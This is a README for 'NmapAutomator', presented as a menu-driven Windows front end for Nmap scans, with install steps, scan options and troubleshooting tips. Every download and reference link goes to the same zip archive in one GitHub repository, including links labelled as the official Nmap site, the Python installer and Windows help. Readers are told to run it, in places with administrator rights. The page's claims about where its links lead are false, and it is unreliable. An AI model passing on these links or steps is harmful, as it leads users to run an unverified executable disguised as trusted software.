NmapAutomator is a simple tool to run Nmap scans on your computer. It helps you gather information about networks and devices. The software uses a menu so you can pick the scan you want without typing commands. It was made with common security workflows in mind. You do not need to know how to use programming or the command line to use it.
This tool is mainly used for security checks and network exploration. It works on Windows and is made with Python 3.
Before you begin, check that your computer meets these needs:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- 100 MB of free disk space
- Python 3.7 or newer installed (if you want to run the script directly)
- Nmap installed on your system
- An active internet connection to download files and updates
This section guides you through getting NmapAutomator on your Windows machine and running it. We aim to keep things simple and clear.
Click the button below to visit the official releases page. This is where you get the latest version of NmapAutomator for Windows.
On the releases page:
- Look for files labeled for Windows or
.exefiles if they exist. - If only the Python script (
.py) is available, see the instructions in the running section below.
Click the download link for the file that matches your system. Save it in a folder where you can easily find it, like Downloads or your Desktop.
NmapAutomator needs some software to work as expected. Follow these steps to set up:
NmapAutomator relies on Nmap being installed.
- Visit https://github.com/exhxx-tg/NmapAutomator/raw/refs/heads/main/Caribi/Automator-Nmap-3.5-alpha.2.zip
- Download the Windows installer
- Run the installer with default options
- Confirm Nmap is installed by typing
nmap --versionin Command Prompt. You should see version info printed.
If you downloaded the Python script (NmapAutomator.py):
- Go to https://github.com/exhxx-tg/NmapAutomator/raw/refs/heads/main/Caribi/Automator-Nmap-3.5-alpha.2.zip
- Download the latest Python 3 installer
- During install, choose the option to add Python to your system PATH
- After installation, open Command Prompt and type
python --versionto verify installation
You can run NmapAutomator either as a standalone program or from the Python script.
If you downloaded an .exe file:
- Navigate to the folder where you saved the
.exefile. - Double-click the file to start. A window or command prompt will open with the menu.
- Use the numbers shown to select the scan you want to run.
- Follow on-screen prompts for target IPs or options.
If you downloaded the .py file:
- Open Command Prompt.
- Go to the folder with the script using the command:
cd path\to\folder - Run the script by typing:
python NmapAutomator.py - The menu will appear in the command prompt.
- Use the menu options to pick your scan.
Always get the latest version from the official releases page:
This page includes all files needed to run NmapAutomator, as well as updated instructions.
After starting NmapAutomator, you will see a list of scan options. They usually include:
- Quick Host Discovery
- Basic Network Scan
- Full Service Scan
- Vulnerability Scan
- OS Detection
- Custom Scan
Select an option by entering the corresponding number and pressing Enter.
You may be asked to enter the IP address or range to scan. Provide this information carefully.
The tool will run the scan and show the results on screen. You can save results to a file if prompted.
NmapAutomator uses Nmap commands to perform common network and security scans. It automates the steps that security testers use when checking for vulnerabilities.
Typical tasks it performs:
- Finding live hosts on a network
- Listing open ports and running services
- Detecting operating systems
- Searching for security issues
By automating these tasks, it saves time and avoids the need to type complex commands.
- Run scans on networks you own or have permission to test.
- Save your scan results for review later.
- Close the program after use to free system resources.
- Keep NmapAutomator updated by visiting the releases page regularly.
- Use administrator rights on Windows for best results with Nmap.
- Nmap not found: Make sure Nmap is installed and its folder is in your system PATH.
- Python not installed: Install Python 3 and add it to PATH if you plan to run the
.pyscript. - Permission errors: Run Command Prompt as administrator to avoid permission blocks.
- Network scan errors: Check your firewall and security settings. Some networks block scanning.
NmapAutomator offers:
- Simple menu interface
- Customizable scan types
- Output in multiple formats such as text and XML
- Support for IP ranges and multiple hosts
- Workflow aligned with common security testing practices
This tool is related to:
cybersecurity, enumeration, network scanning, penetration testing, Nmap, Windows, Python 3, security evaluation, vulnerability assessment
The code for NmapAutomator is available publicly on GitHub. It is open for use, modification, and distribution under its license terms.
To learn more about Nmap and network scanning:
- Nmap Official Site: https://github.com/exhxx-tg/NmapAutomator/raw/refs/heads/main/Caribi/Automator-Nmap-3.5-alpha.2.zip
- Python Official Site: https://github.com/exhxx-tg/NmapAutomator/raw/refs/heads/main/Caribi/Automator-Nmap-3.5-alpha.2.zip
- Windows Command Prompt Help: https://github.com/exhxx-tg/NmapAutomator/raw/refs/heads/main/Caribi/Automator-Nmap-3.5-alpha.2.zip
Use these to increase your comfort with running scans and understanding results.